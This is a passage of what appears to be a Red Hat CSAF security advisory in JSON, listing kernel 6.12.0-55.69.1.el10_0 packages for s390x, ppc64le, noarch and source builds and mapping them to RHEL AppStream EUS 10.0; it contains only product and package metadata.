"purl": "pkg:rpm/redhat/kernel-debuginfo-common-s390x@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-debuginfo@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-core@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-core@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-extra@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "libperf-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-ppc64le@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_id": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-55.69.1.el10_0?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"product": {
"name": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"product_id": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-doc@6.12.0-55.69.1.el10_0?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"product": {
"name": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"product_id": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-abi-stablelists@6.12.0-55.69.1.el10_0?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-0:6.12.0-55.69.1.el10_0.src",
"product": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.src",
"product_id": "kernel-0:6.12.0-55.69.1.el10_0.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-55.69.1.el10_0?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.src as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.src",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
